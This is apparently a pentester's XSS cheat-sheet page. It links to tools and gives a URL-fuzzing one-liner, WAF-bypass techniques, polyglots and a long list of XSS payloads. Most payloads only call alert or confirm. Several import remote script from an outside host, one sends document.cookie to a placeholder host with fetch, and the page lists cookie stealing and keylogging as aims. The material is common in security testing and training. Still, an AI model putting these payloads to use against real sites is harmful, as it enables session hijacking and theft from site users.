# XSS

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

{% embed url="<https://xmind.ai/share/CTAMcPfH>" %}

## Types of attack

* Cookie stealing
* Keylogging
* Webcam snapshot
* Phishing
* Port scanning
* Other browser-based exploits: the range of possibilities with XSS is vast.

## Types of XSS

| Type                             | Description                                                                                                                                                                                                                                  |
| -------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `Stored (Persistent) XSS`        | The most critical type of XSS, which occurs when user input is stored on the back-end database and then displayed upon retrieval (e.g., posts or comments)                                                                                   |
| `Reflected (Non-Persistent) XSS` | Occurs when user input is displayed on the page after being processed by the backend server, but without being stored (e.g., search result or error message)                                                                                 |
| `DOM-based XSS`                  | Another Non-Persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client-side, without reaching the back-end server (e.g., through client-side HTTP parameters or anchor tags) |

## Cheatsheet

{% embed url="<https://portswigger.net/web-security/cross-site-scripting/cheat-sheet>" %}

Burp extension that brings the PortSwigger XSS cheat sheet into Burp:

{% embed url="<https://github.com/PortSwigger/xss-cheatsheet>" %}

{% embed url="<https://portswigger.net/bappstore/eb75d39684b845adb457bcb050d1aa1d>" %}

## One Liner

```
waybackurls test.com | tee test.com-urls.txt | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><svg/onload=confirm(1)>' | tee combinedfuzz.json && cat combinedfuzz.json | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<svg/onload=confirm(1)>" && echo -e "$host \e[31m Vulnerable\n" || echo -e "$host \e[32m Not Vulnerable\n";done 
```

{% embed url="<https://github.com/xnl-h4ck3r/urless>" %}

{% embed url="<https://github.com/xnl-h4ck3r/knoxnl>" %}

```
$ waymore -i urls | tee urls-his
$ cat urls-his | gf xss | urless|anew xss
$ knoxnl -i xss -X BOTH 
```

## Fuzzing

{% content-ref url="fuzzing" %}
[fuzzing](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/fuzzing)
{% endcontent-ref %}

{% embed url="<https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt>" %}

### Bypass weak validations

{% embed url="<https://github.com/0xacb/recollapse>" %}

```
echo "<svg/onload=alert(1)>" | recollapse | ffuf -w - -u "https://example.com/?param=FUZZ" -mc 200,403,500
```

## Reflected Parameters

{% embed url="<https://github.com/Emoe/kxss>" %}

{% embed url="<https://github.com/rootDR/ex-param>" %}

{% embed url="<https://github.com/rix4uni/Gxss>" %}

Chrome extension

{% embed url="<https://github.com/ch1y0w0/ParamScan>" %}

## WAF Bypass - Payload Generator

{% embed url="<https://xssnow.in/xss-payload-generator.html>" %}

{% embed url="<https://brutelogic.net/login?redirect_to=/bypaxss/>" %}

```
0123456789012345678901234567890123456789012345678901"><A Href=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FurYlC6SDN10YuQmKTVbN%2Fimage.png?alt=media&#x26;token=314dabf2-b1f4-4923-b2a9-a0ee73a46d10" alt=""><figcaption></figcaption></figure>

#### JS-DOMestify

JS-DOMestify is a simple tool that helps convert any JS code to browser-runnable code with only ASCII characters and minimal, non-intrusive symbols.

{% embed url="<https://nowasky.github.io/JS-DOMestify/>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FqXCNzps9YBNFuVtqRdKR%2Fimage.png?alt=media&#x26;token=b02ab701-b69a-4541-bb99-9223ce99aab5" alt=""><figcaption></figcaption></figure>

## Basic Payloads

```
'"--><svg/onload=top[30]()>${{4*9}}<script>+alert?.``</script>
```

WAF Bypass

```
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)">
<img/src/onerror="document['default'+'View'][`\u0061lert`](3)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:http://X55.is/.source))}//\76-->
```

Base64 encoded:

```
# http://login.target.com/return_url=sbsbHsjdbdsbsb=
# Payload: "><img src=x onerror=prompt(1337)>

Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KDEzMzcpPg==
```

[Cuneiform](#xss-cuneiform-alphabet-based)-alphabet based

```
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
```

Polyglot payload - All in one

```
1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; >
```

```
1'"<S><Img Src=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
```

```
1'"<S><Input Value=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; PlaceHolder=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
```

```
'"*/onmouseover=(print)?.()><sVg/oNload='1>(_=prompt,_`{{7*7}}`)'></sTyle/</scRIpt/</textArea/</noScript/</tiTle/-->＜h1/<h1><image/onerror='alert`1`%27'src>xhzeem%22%3E%3CSvg/\u0022\u003e\u003csVg/\x22\x3e\x3csVg/&quot;&gt;&lt;svG/onload=alert`2`//
```

Source: <https://brutelogic.com.br/blog/bypassing-whitelists-with-xss-payloads-in-attributes/>

```
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\http://X55.is/.source))}//\76-->
```

Source: <https://x.com/KN0X55/status/1889708590744703269>

In Burp Intruder, add a Grep - Match rule on `1337` so responses that reflect the payload marker are flagged: <https://portswigger.net/burp/documentation/desktop/tools/intruder/uses/fuzzing>

{% hint style="success" %}
1. *Try to start the payloads with a single quote `'` or a double quote `"`.*
2. *Also try with `>`, `'>` and `">`.*
3. *Check the source code to close the appropriate tag if necessary.*
{% endhint %}

{% hint style="success" %}
*Try with confirm() instead of alert()*
{% endhint %}

{% embed url="<https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt>" %}

```javascript
 JavaScript​://%250Aalert?.(1337)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/<​/Style/<​/Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus​= /*${/*/;{/**/(alert)(1337)}//><Base/Href=//hello\76-->
</Scri%7Kt><Scri%7Kt>%7Krompt%6K1337%6K</Scri%7Kt>
"%26%2339>alert(1337)>%26%2339<Svg>
<script>alert(1337);</script>
<sc<script>ript>alert(1337);</script>
<sCriPt>alert(1337);</sCriPt>
<button onmouseover="alert(1337);">xss</button>
<button onclick="alert(1337);">xss</button>
<img src="/static/level3/cloud3.jpg" onclick="alert(1337)">
<img src="x" onerror="alert(1337)">
<img src="x" onerror="alert(1337);"
<img src="#" onerror="&#97;&#108;&#101;&#114;&#116;(1337)">
<img src="#" onerror="al&#x65;rt(1337)">
<img src="#" onerror="eval('alert(1337)')">
<img src onerror %09=top['ale'%2b'rt'](1337)>
<script alert (1337)</script>
<script&#9>alert(1337)</script>
<script&#10>alert (1337)</script>
<script&#13>alert (1)</script>
<%00script>alert(1337)</script>
<script>al%00ert(1)</script>
<input type="text" name ="input" value="1337">
<input type="text" name ="input" value ="><script>alert (1337)</script>
<randomtag type="text" name ="input" value ="><script>alert(1337)</script>
<input/type="text" name="input" value="><script>alert(1337)</script>
<input&#9type="text " name ="input" value =">< alert(1337)</script>
<input&#10type="text" name ="input" value =">< alert(1337)</script>
<input&#13type="text" name ="input" value =">< alert(1337)</script>
<input/'type="text" name ="input" value =">< alert(1337)</script>
<iNpUt type="text" name ="input" value =">< alert(1337)</script>
<%00input type="text" name="input" value="><script>alert(1337)</script>
<inp%00ut type="text" name ="input" value =">< alert(1337)</script>
<input t%00ype="text" name="input" value="><script>alert(1337)</script>
<input type="text" name ="input" value ="><script>a%00lert(1337)</script>
<input onsubmit alert(1337)>
<img onerror=&#34alert(1337)&#34src=x>
<img onerror=&#39alert(1337)&#39src=x>
<img onerror=`alert(1337)` src=x>
<img onerror=&#96alert(1337)&#96src=x>
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1337)>
<<script>alert(1337)//<</script>
«input onsubmit=alert(1337)»
&#174input onsubmit=alert(1337)&#175
<script>eval('a\u006cert(1337)')</script>
<script>eval('al' + 'ert(1337)')</script>
<iframe src="javascript:alert(`1337`)">
testfmy90"onfocus%3d"alert(1337)"autofocus%3d"ed3vz
<script>alert(1337)</script>
<Script>alert(1337)</Script>
<sCript>alert(1337)</sCript>
<script>alert(1337);</script>
<script>alert("1337");</script>
<script>alert(1337)</script>
<script>window.pageType = 'test'-alert(1337)-'';</script>
</script><script>alert(1337)</script>
\&#34;+confirm(1337)+&#34; 
//%01javascript:alert(1337)
%09Jav%09ascript:alert(1337)
/%09/javascript:alert(1337)
/%09/javascript:alert(1337);
//%0Aalert(1337)
////%0Aalert(1337)
//%0D%0Aalert(1337)
/%5cjavascript:alert(1337)
/%5cjavascript:alert(1337);
//%5cjavascript:alert(1337)
//%5cjavascript:alert(1337);
";alert(1337);//
";alert(1337);//bash
java%0d%0ascript%0d%0a:alert(1337)
javascript://%0aalert(1337)
javascript://%00alert(1337)
javascript://%0aalert(1337)
javascript://%0Aalert(1337)
javascript://%250A1?alert(1337):0
javascript://%250Aalert(1337)
javascript://%250Aalert(1337)//?1
javascript:alert(1337)
//javascript:alert(1337)
//javascript:alert(1337);
/javascript:alert(1337)
/javascript:alert(1337);
<>javascript:alert(1337);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1337\)
javascript:alert(1337)
javascript:alert(1337);
javascript:alert(1337)%0d%0a
javascript:confirm(1337)
javascript:prompt(1337)
javascript:void(0);alert(1337)
/x:1/:///%01javascript:alert(1337)/
1')"<S --><A HRef AutoFocus OnFocus=(confirm)(1337)//
JavaScript://%250Dtop.confirm?.(1337)//
1'-top['con\146irm'](1337)-'
/confirm?.(1337)//\
test"/><output name="result" onclick="alert(1337)">chux</output>
<!--%26gt;<TextArea><!--><Script>/*/</TextArea>/*/alert(1337)</Script>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(1337)%3C/scRipt%3E
test"<s><a href=//%26lt;svg/o%26%2378;load=alert(1337)%26gt;>
%22%20onmouseover=alert(1337)%20x=%22
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<Svg OnLoad=location=textContent>JavaS<a>cript:al<a>ert(<a>1337)//
<Svg OnLoad=location=`Java${/S/.source}cript:alert${"\50"}1337)`>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
1'//"</Script><Img/Src%0AOnError=alert(1337)//
jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert(1337)%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert(1337)//%3E%5Cx3e
<script\x20type="text/javascript">javascript:alert(1337);</script>
<script\x3Etype="text/javascript">javascript:alert(1337);</script>
<script\x0Dtype="text/javascript">javascript:alert(1337);</script>
<script\x09type="text/javascript">javascript:alert(1337);</script>
<script\x0Ctype="text/javascript">javascript:alert(1337);</script>
<script\x2Ftype="text/javascript">javascript:alert(1337);</script>
<script\x0Atype="text/javascript">javascript:alert(1337);</script>
'`"><\x3Cscript>javascript:alert(1337)</script>        
'`"><\x00script>javascript:alert(1337)</script>
<img src=1 href=1 onerror="javascript:alert(1337)"></img>
<audio src=1 href=1 onerror="javascript:alert(1337)"></audio>
<video src=1 href=1 onerror="javascript:alert(1337)"></video>
<body src=1 href=1 onerror="javascript:alert(1337)"></body>
<image src=1 href=1 onerror="javascript:alert(1337)"></image>
<object src=1 href=1 onerror="javascript:alert(1337)"></object>
<script src=1 href=1 onerror="javascript:alert(1337)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1337)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1337)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1337)"></iframe onLoad>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a(1337)%20x>
<audio controls onwaiting=alert(1337)><source src=x type=x></audio>
'<00 foo="<a%20href="javascript:alert(1337)">XSS-CLick</00>--%20/
<K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/;{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>\
<section onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></section>
</<K><Svg Onload=alert(1337)>
</<Kno XSS="><Svg Onload=alert(1337)>
<!<K><Svg Onload=alert(1337)>
<!<Kno XSS="><Svg Onload=alert(1337)>
<a href="javascript:alert(1337)">show</a>
<a href="data:text/html;base64,<alert(1337) encoded>"show</a>
<form action="javascript:alert(1337)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1337)">send</button>
<object data="javascript:alert(1337)">
<object data="data:text/html;base64, <alert(1337) encoded>">
<body onload=alert(1337)>
<input type=image src=x:x onerror=alert(1337)>
<isindex onmouseover="alert(1337)" >
<form oninput=alert(1337)><input></form>
<texarea autofocus onfocus=alert(1337)>
<input oncut=alert(1337)>
<svg onload=alert(1337)>
<keygen autofocus onfocus=alert(1337)">
<video><source onerror="alert(1337)">
<marquee onstart=alert(1337)>
<svg/onload=alert(1337)>
<svg//////onload=alert(1337)>
<svg id=x; onload=alert(1337)>
<svg onload%09=alert(1337)>
<svg %09onload=alert(1337)>
<svg %09onload%20=alert(1337)>
<svg onload%09%20%28%2C%3B=alert(1337)>
<svg onload%0B=alert(1337)>
<svg id='x' onload=alert(1337)>
<script>\u0061lert(1337)</script>
<script>\u0061\u006\u0065\u0072\u0074(1337)</script>
<script>eval("\u0061lert(1337)")</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0033\u0033\u0037\u0029")</script>
<img src=x onerror="\u0061lert(1337)"/>
<img src=x onerror="eval('\141lert(1337)')"/>
<img src=x onerror="eval('\x61lert(1337)')"/>
<img src=x onerror="eval('&#x0061;lert(1337)')"/>
<img src=x onerror="eval('&#97;lert(1337)')"/>
<img src=x onerror="eval('\a\l\ert(1\)')"/>
<img src=x onerror="eval('\a\l\ert(1\3\3\7\)')"/>
<object data="JaVScRiPt:alert(1337)">
<object data="javascript&colon;:alert(1337)">
<object data="javascript&#x003A;alert(1337)">
<object data="javascript&#58;alert(1337)">
<object data="&#x6A;avascript:alert(1337)">
<object data="data:text/html,<script>alert(1337)</script>">
<embed code="DaTa:text/html,<script>alert(1337)</script>">
<embed code="data&colon;text/html,<script>alert(1337)</script>">
<embed code="data&#x003A;text/html,<script>alert(1337)</script>">
<embed code="&#x64;&#x61;ta:text/html,<script>alert(1337)</script>">
<scr<iframe>ipt>alert(1337)</script>
<scr<script>ipt>alert(1337)</script>
<svg/onload=alert(1337)
"><svg/onload=alert(1337)>
";alert(1337);//
<iframe><style id="</iframe><img src=1 onerror=alert(1337)>">
<noframes><style id="</noframes><img src=1 onerror=alert(1337)>">
<noscript><p id="</noscript><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src="1" onerror="alert(1337)">">"&gt;
<svg><style><img src="1" onerror="alert(1337)">
<math><style><img src="1" onerror="alert(1337)">
<math><style></style></math><img src="1" onerror="alert(1337)">
<select><style><input><img src=1 onerror=alert(1337)></select>
<select></select><input><img src="1" onerror="alert(1337)">
<body><title><p id="</title><img src onerror=alert(1337)>"></title>
<body><noscript><p id="</noscript><img src onerror=alert(1337)>">
<maths><style><!--</style><img src onerror=alert(1337)>--></style></maths>
<svg><style>/*<img src onerror=alert(1337)>*/</style></svg>
<math><style>/*<img src onerror=alert(1337)>*/
<noscript><style>/*</noscript><img src onerror=alert(1337)>*/
<math><annotation-xml><style><img src onerror=alert(1337)></style></annotation-xml></math>
<body><textarea><a is="</textarea><img src onerror=alert(1337)>">
<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(1337)>">
<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(1337)>">
<Img Src=OnXSS OnError=alert(1337)> 
confirm?.(1337)
<svg/onload=window[`al`+/e/[`ex`+`ec`]`e`+`rt`](1337)>
<svg/onload=window["al"+"ert"]`1337`>
<svg/onload=document['default'+'View'][`\u0061lert`](1337)>
<svg/onload=parent[/al/.source+/ert/.source](1337)>
<svg/onload=parent[/al/.source.concat(/ert/.source)](1337)>
<svg/onload=(function(x){this[x+`ert`](1337)})`al`>
"&quot;"ontoggle=alert(1337)
"' &quot;'"ontoggle=alert1337
1%27/prompt?.(1337)/%27
*prompt(1337)*
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<img//////src=x oNlY=1 oNerror=alert(1337)//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1337>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1337`//>
%3CSVG/oNlY=1%20ONlOAD=confirm(1337)%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601337\%60&#x27;&gt;
<Img Src=OnXSS OnError={prompt`1337`}>
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
"><div/onclick="(function(){setTimeout(()%20=>%20alert(1337),%200);})();">Click%20me!</div>
<Img Src=OnXSS OnError=confirm(1337)>
"><input%0a%0atype="hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/1337/)%0d%0astyle=content-visibility:auto>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto">
x' oncontentvisibilityautostatechange=alert(1337) style='display:block;content-visibility:auto
<p oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto">
test" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto
test" oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto
<Img/Src/OnError=(alert)(1337)>
1%27;--<img%20src=x%20onerror=javascript:alert(1337)>
"></a></td></tr></table><​script>prompt('1337');<​/script></html>//
1")'--><Svg%0COnLoad=(confirm)(1337)<!--
%3Cimg%20src%3Dx%20onerror%3D%22%5Cu0061lert(1337)%22%3E
<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a><style><! \${ </style> }<foo-b id="><img src onerror='alert(1337)'>">hmm...</foo-b></a></table></li></mi></foo-test></math>
'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1337)>
%27";}</script><script>prompt(document.domain);</script>
<svg xmlns="http://w3.org/2000/svg" onload​="this.setAttribute('onmouseover','confirm(1337)')"></svg>
1'"--><A HRef AutoFocus OnFocus=alert(1337)//
1</Script><Script>1/*'/*\'/**//alert(1337)//
";(a=alert,b=1337,a(b))//
frames['alert'](1337)
1;/*'"><Img/Src/OnError=/**/confirm(1337)//>
<script>throw-0o1337n,x=onerror=alert,1337</script>
onToggLe='let%20x=%60javascri%60%3Blet%20y=%60pt:aler%60%3Blet%20z=%60t(1337)%60%3Blet%20a=x+y+z%3Blocation=a'>
<img/src/onerror="(function(x){this[x+`ert`](1337)})`al`">
<img/src/onerror="window[`al`+/e/[`ex`+`ec`]`e`+`rt`](1337)">
<img/src/onerror="document['default'+'View'][`\u0061lert`](1337)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](1337)">
<Img Src=OnXSS OnError=(alert)(1337)>
<A Href AutoFocus %252F="/"OnFocus=k='t',top['aler'%2Bk](1337)>
%3CSVG/oNlY=1%20ONlOAD=confirm(1337)%3E
throw onerror=eval,x=new Error,x.message='alert\x281337\x29',x
--'<00 foo="<a%20href="javascript:prompt(1337)">XSS-Click</00>--%20//
'<00 foo="<a%20href="javascript:alert(1337)">XSS-CLick</00>--%20/ 
</h1>%3CSVG/oNlY=1%20ONlOAD=confirm(1337)%3E
"><svg><animate onbegin=event/>⁄<set attributeName=onerror/to=alert`1337`
<svg onload="a=domain,b=confirm,c=window,c.onerror=b;throw a">
<svg id=javascript:alert(1337) onload=location=id>
<0 name="<svg/onload=alert(1337)>">
<cool/onpointermove=(confirm)(1337)>MoveMouseHere
Payload;"style="width:100%;height:10000px;background:red" onmouseover="alert(1337)
Payload; </ <a href="><svg/onload=alert(1337)>">
"style="width:100%;height:10000px;background:red" onmouseover="alert(1337)
</ <a href="><svg/onload=alert(1337)>">
<a href="javascript:alert/**/('1337')">click</a>
<script>alert/**/('1337')</script>
<svg><script>ale<!-- -->rt('1337')</script></svg>
<svg><script>ale<//looks like js comment>rt('1337')</script></svg>
<img/src/onerror="alert/* */('1337')">
```

Payload List

```javascript
</Scri%7Kt><Scri%7Kt>%7Krompt%6K1%6K</Scri%7Kt>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--</Title/</Style/</Script/</textArea/</iFrame>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\http://X55.is/.source))}//\76-->
"%26%2339>alert(1)>%26%2339<Svg>
<script>alert('xss');</script>
<sc<script>ript>alert('xss');</script>
<sCriPt>alert('xss');</sCriPt>
<button onmouseover="alert('xss');">xss</button>
<button onclick="alert('xss');">xss</button>
<img src="/static/level3/cloud3.jpg" onclick="alert('xss')">
<img src="x" onerror="alert('xss')">
<img src="x" onerror="alert(document.cookie);"
<iframe src="javascript:alert(`xss`)">
testfmy90"onfocus%3d"alert(1)"autofocus%3d"ed3vz
<script>alert(1)</script>
<Script>alert(1)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(123);</script>
<script>alert("test");</script>
<script>alert(document.cookie)</script>
</script><script>alert(document.cookie)</script>
\&#34;+confirm(1)+&#34; 
//%01javascript:alert(1)
%09Jav%09ascript:alert(1)
%09Jav%09ascript:alert(document.domain)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
//%0Aalert(1)
////%0Aalert(1)
//%0D%0Aalert(1)
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
";alert(0);//
";alert(0);//bash
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
java%0d%0ascript%0d%0a:alert(0)
javascript://%0aalert(document.cookie)
javascript://%00alert(1)
javascript://%0aalert(1)
javascript://%0Aalert(1)
javascript://%250A1?alert(1):0
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250Alert(document.location=document.cookie)
javascript:alert(0)
//javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1)
/javascript:alert(1);
<>javascript:alert(1);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1)
javascript:alert(1);
javascript:alert(1)%0d%0a
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
javascript:void(0);alert(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
javascript://whitelisted.com/?z=%0Aalert(1)
/x:1/:///%01javascript:alert(document.cookie)/
1')"<S --><A HRef AutoFocus OnFocus=(confirm)(1)//
JavaScript://%250Dtop.confirm?.(1)//
1'-top['con\146irm'](1)-'
/confirm?.(1)//\
<img src=x onerror="fetch('[HOST]' + document.cookie)" />
<script>fetch('[host]')</script>
test"/><output name="result" onclick="alert('something')">chux</output>
<!--%26gt;<TextArea><!--><Script>/*/</TextArea>/*/alert(1)</Script>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E
test"<s><a href=//%26lt;svg/o%26%2378;load=alert(1)%26gt;>
%22%20onmouseover=alert(document.domain)%20x=%22
<<https:http://x55.is/onfocus=1?import(tagName):1 AutoFocus ContentEditable>>
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<Svg OnLoad=location=textContent>JavaS<a>cript:al<a>ert(<a>1)//
<Svg OnLoad=location=`Java${/S/.source}cript:alert${"\50"}1)`>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
1'//"</Script><Img/Src%0AOnError=alert(1)//
jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e
--'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20//
</h1>%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
